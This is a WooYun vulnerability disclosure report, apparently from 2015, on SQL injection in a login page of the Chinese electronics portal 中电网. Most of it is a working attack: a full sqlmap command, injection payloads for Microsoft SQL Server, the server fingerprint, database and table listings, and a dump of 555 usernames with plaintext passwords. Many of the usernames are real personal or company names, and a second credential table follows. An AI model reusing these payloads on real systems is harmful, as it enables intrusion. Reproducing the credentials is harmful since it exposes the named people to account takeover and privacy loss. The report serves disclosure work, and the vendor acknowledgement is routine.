乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-04: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-16: 细节向核心白帽子及相关领域专家公开 2015-11-26: 细节向普通白帽子公开 2015-12-06: 细节向实习白帽子公开 2015-12-21: 细节向公众公开
中电网是中国领先的电子行业门户网,致力于为中国电子工程师提供“一站式”服务。中电网提供的服务包括:电子行业新闻、最新产品和技术信息、解决方案、设计应用文章、在线座谈、在线培训、电子百科、技术论坛、样品快递、现场及网上研讨会等。在中电网,电子工程师不仅可以及时获得业内最新的热点新闻和技术信息,还可以参加在线座谈,直接与技术厂商互动交流;通过在线培训充实知识、提高技能;并可以通过中电网的样品快递服务获得样品和开发套件;中电网也是中国最热的电子工程师社区。中电网按技术门类对网站内容作了详尽的分类,查找方便快捷。中电网还重点建设了“嵌入式系统”等十几个热点技术频道,深受广大电子工程师的欢迎。中电网成立于2000年,目前的注册电子工程师会员超过45万人,企业会员12,000多家,用户群涵盖通信、消费电子、计算机与外围设备、工控与自动化、汽车电子、广播电视、航天、军工等诸多领域。
地址:http://**.**.**.**/login.asp?id=56&ref=/030522/jchf.asp
python sqlmap.py -u "http://**.**.**.**/login.asp?id=56&ref=/030522/jchf.asp" --form -p id --technique=BEQU --random-agent --batch -D chinaecnet -T usertable -C name,password --dump
Database: chinaecnetTable: usertable[555 entries]+-----------------+--------------+| name | password |+-----------------+--------------+| 007 | 6661860 || 111 | 111 || 123 | 123 || 1234 | 1234 || 444444444444 | 444 || 749 | 749888 || 8206788 | 8206788 || 8884 | 4536 || 89533 | 89533 || 9898 | 9898 || aabb | aabb || abcd | 7788 || AC POWER CORP. | 24415921 || adam627 | wbh628 || adqliang | 336403 || agencyoem | 6968693 || alex-zhang | 756839 || amazon | 506628 || amos | 730312 || amos73 | 730312 || ansse | ansse || ANSSEZHHOU | ANSSE || aoe0495 | 700116 || apricot | zhigang || as | av || asdf | 741008 || asiancyber | asiancyber || aut | 87321041 || b2btest | b2btest || b2btestlqf | b2btestlqf || banker08 | 961208 || bbell chung | 760811 || bbgui | bbliking || beck | 1104 || BEILIN | 317496 || beiyue | 88088 || ben | 120 || bjbeilin | ch1113 || bjgps | 80485 || bjsales | bjsales || bjxwj | xwj1218 || blzkgs | pengtao || bmw | bmw || bngong | 700211 || bohai | bohai || btx | 1234 || buaaczj | 123456 || bwm | puli || bxhost | bxhost123 || bxhost123 | bxhost123 || carrie9 | 404414 || CATHAY | 225578 || cbit | ls || ccyu | pzmiao123 || cdtm | cdtm9988 || cent | shcent || cf2000 | cf2000 || chanda | 197012 || chasten | 1518 || chen | 731027 || chengjg | shuichuan || chenjain | chenjian || chenjian | chenjian || chentie | 7315 || chenwendong | 740400 || chenwenyuan | 970804 || chenwy | 970804 || chenxin813 | 314159 || chiec | chiec || chinab2b | runforest || chinaysj | config || chongde wang | 700813 || chs | chschs || cjb | bjc || cjb1212 | 681212 || cjb681212 | 681212 || cjj | 965140 || cjj965140 | 965140 || CTHXY | 22222 || cuifeng | 7873801 || DDD | 222 || Dee | 12160817 || dengyong | dy1 || dingjf | arrow || dlham | bg2tah || doer | doer || donghai | 1220 || dongzi2000 | 6596239 || DTT | 1019 || dushi | 7872062 || dxy1 | wbclj || dyksl | 740413 || dyxp | 512627 || ED | hello || ednamoon | ednamoon || et.et | 58008419 || fan | fan || fareast | xiaolai123 || fareast63 | xiaolai123 || fay | yi.or || fchh | 827915 || ferfect | xghaa || fgm | zwglw163zh || FLY_WHY | 076126 || fsdhc | fsdhclw || fuchuan | flower30 || fy519 | hzyqcai || Ge Deqi | 770309 || gentle | millex206 || gipsy | 1 || GLW | 19520630 || greatway | gw44123 || gst | lookman || gsthkchina | coco || gychen | 554108 || gzaut | 87321041 || hailong | *1973# || hanmze | 920035 || HAODE | bcksa || happyxiaoyue | 770627 || harke | hzhhzh || harry | 123123 || haventchen | 95157051 || hawkmiao | 70847084 || hectorlui | hectorlui || HEDAWEI | MONEY || hello | loveyou || henry | gw44123 || hetong | protel || hezhichun | 8246127 || HFWMX | DZBSSYJS || Hit | 1976121 || hix | 7862678 || hjjydx | 123 || hjx | 7862678 || hlqin | hua6001 || htc | 13586 || huang | 1234 || Huang Xiao Yang | straight || huanghb | 12720333 || huangyaonb | 20031 || huangyuefen | 770627 || huifeng | 730915 || hunter | 6510 || huyongjun17 | 740315 || hwh | 13586 || hyb | 53612652 || hyg321 | hyg123 || hz | 781129 || ic2000 | hjx || icshop | wszycj || infogate | 78920 || jackma | 55555 || jackma5 | 55555 || jackyu | 1973 || jane | 1 || Javakuang | 432301 || jct | jctgxd || jebour | 111111 || jerry | jerry || jerry_yu | jerry || jiajia | jiajia || jiangwanli | dongtinghu || jim_zhang_2001 | 2808 || jingxy | 111168 || jjm99 | youling || jkliu2001 | 1 || jldq | 19880808 || jmwwq | 12345 || JOHN WANG | 8334 || johnfeng | 730904 || johnwoo | 741128 || js | JS || jzq1206 | l4wAlMTY || kehu01 | 042800 || kenny_lee | 197072 || kent | 0714 || kenweld | 670225 || keqiang | 362401 || keset | lxcc || langxiang | gl6880 || ld007 | feiyang || LDM | 700210 || ldq | 1997 || ldypipi | 8062531 || ldypipi1999 | 8062531 || ledoem | china || lengyun | 123456 || leo_liao | diane || Lewis Lu | WbiA17 || lgc | lgc2000 || lhln | 862541 || lhw6608 | hwlhwl || li | 000 || LI HAO | 862541 || li_kang | 6968693 || li8h | love88 || liil | 9614 || lijian | 221811 || likang | 6968693 || lili | 121 || liqian | 570930 || litwh | wt809 || liuchongyu | 0929 || liugan | windows || LiuJun | Liu!Jun || liutong | 5171282 || liuxiaoming | 1 || liuxq | bit54 || lixuehai | llxxhh || liyongfu | 5899702 || lizhou hou | faked || lqf | lqflqflqf || lsd | denying || ltj | 11111 || ltz | 616918 || luihooyin | lhy || lumu | 81961372 || lushi | 930312 || luxiaoqiang | 711116 || luxinduo | 0717 || LWJ | 000923 || lxiaoq | bit54 || lxq968 | llxdqh || lxwwhj | 661011 || LY | 7761 || lzh0148 | lzhlzh || m98969 | 594198 || malei007 | 12345678 || mao xing biao | 790930 || martin chen | 1020 || maxwell | q1o8o4 || mcc | mcc || meetingchina | 126711 || meixiaoyan | 770530m || mengkaizh | zh560407 || miser | 111111 || mmmmm | mmmmmm || MOONGIRL | MOONGIRL || mozhao | 29138 || mqz | 631208 || mrsjy | SINAsjy7624 || mrsjy30 | SINAsjy7624 || Nancy Huang | 741130 || Nancy Huang1 | 741130 || narada | 11111111 || ndy | 00000 || netong | protel || nhgxzq | 171831 || nianxing | nx527910 || nihao | 0428 || njtusc | 939600 || njusc | 939600 || nnd | 111111 || nwjt | wjtt928 || oe | oe || ofs | ofs111 || opt | syxzopt || paite | 11223344 || pengkung | 420117 || pengtao | pengtao || pest | drowssap || pick | 953458 || pjy | pjy || preset | lxcc || prince | 88888888 || PTZJ | 041605 || pzh | hlzeng || qian | 7747 || qinf | 5466 || qkqcp | 123456 || qpqp | qpqp || qqqq | 0000 || Ranger | st0501 || RangerC | st0501 || realwb | rayto || redtusk | redtusk || reset | lxcc || rilin | ecghjk08 || rl88 | 126711 || robin | 123 || rocwang | 2234 || romain | 856663 || sammi.lee | 0000 || sandy | sandy123 || sanping | sanping || sansitech | fangang || sdgfht | 123 || SeaSky_Tiger | 2102767 || shenbeilun | loginlun || shenou | 8125 || shhec | 3614 || shine | sunshine || shssxwjdqc | 19761215 || skywards | 362630 || smihtc | smihtc || SONGFANG | 9001450 || srcbj | q1o8o4 || stnwy | 98718769 || stvvv | 140442 || styan | 197645 || suitian | suitian69 || sunstrong | mly`1963 || suyong | suyong || sxgwepc | 123456 || syksl | 740413 || szhtmy | 3604131 || szhtmyic | 3604131 || szlhd | 930928 || talpov | 142857 || TCZZY | 7031156 || test | test123 || test1 | test123 || thomas_sheng | 007313 || tj001 | 471711 || tjlouzy | 720315 || Tom | 19810824 || tongweiyun | 954321 || tony | tony123 || tony99 | tony99 || Toprun | Toprunx || Treeman.L | 84218421 || triloop | 166811 || twy | 500016 || twy1 | 500016 || tz1208 | 616918 || voyager | yangvoy || w1118 | 118439 || wang | wang || wang1 | 1 || wangllei | 315931 || wanglw | wtyx || wave | 85321 || WB | 690520 || weidejiao | 7711 || wenbin | 901406 || wendy | 12345 || WHJLXW | 661011 || wiler wang | 13178 || winghing-aw | wh || wingo | 223344 || wj_zou | zwj0206 || wjg | 123 || wjmzh | 197104 || wjmzh1 | 197104 || wjq | 88888888 || wjz888 | 5400067 || wonser | 118439 || wqx88 | 8074 || wsxnet | w || wuhai | 12345 || wushixiang | wu || wusx | www || WUSX2000 | w || wuwq | 12345 || wuwu | w || wuxil | nj8013cs || wuxin | symbol\\/ || ww | 001969 || www1234 | 1234 || wxhx | 5226022 || wyq | 680517 || wyy727 | wyy123 || wzdk | dk888 || xgyaguang | xgqqq || xia | xia || xiacait | xiacait || xiacait0828 | 19761215 || xiajianxi | 750808 || xiay | 753159Wc#4 || xidieke | 123456 || xiechaoqun | 929 || XIEXH | 690311 || xj_wang | wxj204 || xnda | 880518 || xufen | xufen || xuyong | 0419 || xxgang | 756210 || xxt | 123456 || xxxxxxxx | xxxxxxxx || XXZ | guokeer || xygwl | 575883 || yaba | 585858 || yaguang | yaguang || yan jianguo | yjg || YANG | XYA123 || yang yinb | yybyyb || yang.ag | 24415921 || yangguang | 7873801 || yangjian | 24396256 || yangxz | 364062 || yanxiongwei | duoduo || yaozn | 7873801 || yermen | 62323 || yexi | 939600 || yexii | 939600 || yfc | 2563 || yh | yh || ykkf | ykkf || ym.zhan | 1008 || yu | 1973 || yuan | luxer || yufn | yu0927 || Yuguang Yang | 860911 || yuzilong | 1973 || ZABC | 9812 || zgy | 123456 || zhabin | a0p1p6l4 || ZhangCheng | wenrong1 || zhangjiaji | 8817902 || zhangjiaji1 | 8817902 || zhangliang | 345678 || zhangqihu | andy || zhangwei | 691203 || zhangxu | 921107 || zhaoqiuyun | 1557p || zhhm | wsk59ga1 || zhiqiang | 8416307 || zhou rong | 1234 || zhouwen | 770218 || zhuty | zhuty || zhxan | 985569 || ZJJSJLDQ | 19880801 || zjkl | 8880017 || zlmzhong | 741208 || ZM74 | 2174136 || zpzhk | 750828 || zsh | zsh3210 || zsmc | king || zsq | 111222 || ZTOUCH | 6A6A6A || zzhhd | zzhhd || zzjj777 | 776150 || zzlight | 8617056 || 柏俊 | 75219 || 宝丰ATI | YYL68118 || 北京市恒威电子系统公司 | zrevek || 北京英辰 | ycdz2000 || 北京中软 | RXIC || 步步高电子产品无锡售后服务中心 | 212223 || 常戎 | 980922 || 陈建军 | 62475893 || 陈进杰 | 965140 || 陈先生 | friend || 陈晓曙 | 941059 || 陈雪 | chen1114 || 电子 | okokok || 董春 | 6413372 || 付昕军 | 7523 || 富历新 | 6413372 || 高全胜 | 1963824 || 高衍龙 | line || 葛德奇 | 770309 || 顾军杰 | 961012 || 郭华玲 | 8383734 || 汉瞻公司 | hzyqcai || 郝云鹏 | 888 || 恒通电脑 | 13586 || 胡春来 | 1234 || 胡开农 | pass || 胡文 | 7301 || 花明渊 | 314159 || 华电网 | 12345 || 黄继忠 | 123456 || 黄晓春 | huang || 京大电脑中心 | 661011 || 科瑞达 | 800323 || 邝亚凌 | kknd42 || 蓝鸥 | 82667550 || 廊坊市慧普电子有限公司 | 770925 || 李贵荣 | ei41 || 李洪亮 | 901554 || 李辉 | 1109 || 李加荣 | 6269550 || 李建堂 | 26774769 || 李靖 | 613076 || 李军 | 26774769 || 李康 | 6968693 || 李鹏77 | 761008 || 李鹏77216 | 761008 || 李文胜 | 123123 || 梁峰 | forliang45 || 林永生 | 92371 || 林永胜 | 92371 || 刘湘毅 | lxy || 骆天天 | 123 || 马德荣 | 7809 || 马立新&科瑞达 | 800323 || 马留石 | 127871 || 马生 | 594198 || 孟祥宾 | 123456 || 孟祥宾8 | 123456 || 宁波中策电子有限公司 | okokok || 普冠电子 | samli || 奇麗新貿易有限公司 | 5238 || 钱飞龙 | 641227 || 全军 | 0326 || 全哲雄 | quanzx || 阮章莹 | 359888 || 赛博电子 | 5617010 || 上海岛谷科技有限公司 | 7747 || 上能公司 | 123456 || 邵国振 | xfjdsgz || 深圳市多和电子技术有限公司 | 396103 || 史慧杰 | 888999 || 舒海涛 | sht || 宋财华 | ghf423 || 宋建才 | songjc || 苏斌 | chinavision || 苏洪端 | 730605 || 孙辉 | 681020 || 孙志强 | 8416307 || 汤家骏 | ustctjj || 唐杰 | tangjie || 唐正兴 | 8828549 || 天津磁卡 | aaaaaaaa || 田松 | 5061339 || 铁矿 | 0520ch || 王定军 | 2004 || 王海龙 | 123 || 王海龙123 | 123 || 王皓奎 | 1870209 || 王继刚 | 961122 || 王伟 | 888888 || 王新杰 | wxj204 || 王耀威 | &WxYlWj! || 王垣平 | 63919 || 伟兴科电 | weixing || 无锡华新电子有限公司 | 5226022 || 吴晓林 | lookup || 西安三才电子有限公司 | 618 || 夏才通 | xiacaitong || 小鱼 | 740126 || 邢向前 | 977320 || 徐贤伟 | 017713 || 许宁 | 6661860 || 延光 | 81000 || 杨波 | y1b8b6p2 || 杨林 | yl1369 || 姚美英 | 701223a || 叶晖 | 123123 || 伊杨 | asdiad || 由利人 | 1026 || 于立军 | 701223a || 詹雨明 | 1008 || 张锋 | htxx001 || 张惠君 | 307648 || 张全 | 171831 || 正光公司 | 123 || 正华公司 | 28641 || 智力科学仪器厂 | 62712778 || 中策电子 | okokokwywywy || 周华 | 770101 || 周江滨 | 610830 || 祝英霞 | oio8lo9. |+-----------------+--------------+
选取部分用户登陆展示:
---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000current user: 'ecnetdb'current user is DBA: Falsesqlmap resumed the following injection point(s) from stored session:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000database management system users [4]:[*] BUILTIN\\Administrators[*] ecnetdb[*] robin[*] sasqlmap resumed the following injection point(s) from stored session:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000available databases [27]:[*] brand[*] chinaecnet[*] COIE[*] datasheet[*] demo[*] E-HUB[*] EMD[*] hr[*] info[*] Management[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] purchase[*] sales[*] seminar_emnet[*] seminardemo[*] survey[*] symposium[*] TechApp[*] tempdb[*] TrainingNew[*] translation[*] webservice_st[*] XilinxGamesqlmap resumed the following injection point(s) from stored session:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000Database: chinaecnet[65 tables]+--------------------------------------+| Converter_2000.09.17 || Converter_2000.09.17 || Cat_GTmart2Online || DataFromAvNet || DataToAvNet1 || DataToAvNet1 || ExpQuery || HK_Capital || HK_Carton || HK_Packing || HK_Storage || Items_Status || MfgPDFUrl || Results || SZ_Capital || SZ_Carton || SZ_Packing || SZ_Storage || ano_query_items || ano_quote_items || basket || category_bg5 || category_bg5 || ceast || chinamat || com_hot_products_bak_data_from_dr_wu || com_hot_products_bak_data_from_dr_wu || consult || contract_info_000115 || contract_info_000115 || contract_items_000115 || contract_old || cyfd || demo_info || demo_items || dtproperties || gtmart_category_chinaecnet || mytmp || ordertable || p_contract || p_contract || po_info || po_items || pro_gtmart2online || products || query_info || query_items || quote_info || quote_info || quote_items || result_info || sample_basket || sample_basket || sample_dept || sample_product || subusertable || sysconstraints || syssegments || test_basket || userinfo || usertable || v_commfg || v_compnb || v_hotmfg || v_hotpnb |+--------------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000Database: chinaecnetTable: userinfo[4 columns]+----------+------+| Column | Type |+----------+------+| address | char || id | int || name | char || password | char |+----------+------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 7828=7828&bookIn2=%E7%99%BB %E5%BD%95 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=56 AND 4141=CONVERT(INT,(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (4141=4141) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113)))&bookIn2=%E7%99%BB %E5%BD%95 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=(SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) (SELECT (CASE WHEN (7783=7783) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113))&bookIn2=%E7%99%BB %E5%BD%95 Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: username=fuBs&password=&ref=C:/Program Files (x86)/Git/030522/jchf.asp&id=-4230 UNION ALL SELECT CHAR(113) CHAR(112) CHAR(122) CHAR(112) CHAR(113) CHAR(118) CHAR(117) CHAR(88) CHAR(109) CHAR(81) CHAR(68) CHAR(66) CHAR(68) CHAR(100) CHAR(101) CHAR(84) CHAR(98) CHAR(103) CHAR(80) CHAR(75) CHAR(66) CHAR(65) CHAR(76) CHAR(80) CHAR(79) CHAR(72) CHAR(75) CHAR(89) CHAR(83) CHAR(107) CHAR(109) CHAR(105) CHAR(104) CHAR(84) CHAR(108) CHAR(72) CHAR(68) CHAR(82) CHAR(114) CHAR(99) CHAR(76) CHAR(84) CHAR(81) CHAR(100) CHAR(117) CHAR(113) CHAR(122) CHAR(113) CHAR(118) CHAR(113),NULL,NULL-- -&bookIn2=%E7%99%BB %E5%BD%95---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft SQL Server 2000Database: chinaecnetTable: userinfo[4 entries]+----+------------+------------+| id | name | password |+----+------------+------------+| 1 | viptest | test || 2 | test | test || 3 | HKECN | hongk2001 || 4 | SZECN | shenz2001 |+----+------------+------------+
增加过滤。
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 15:16
CNVD确认所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无
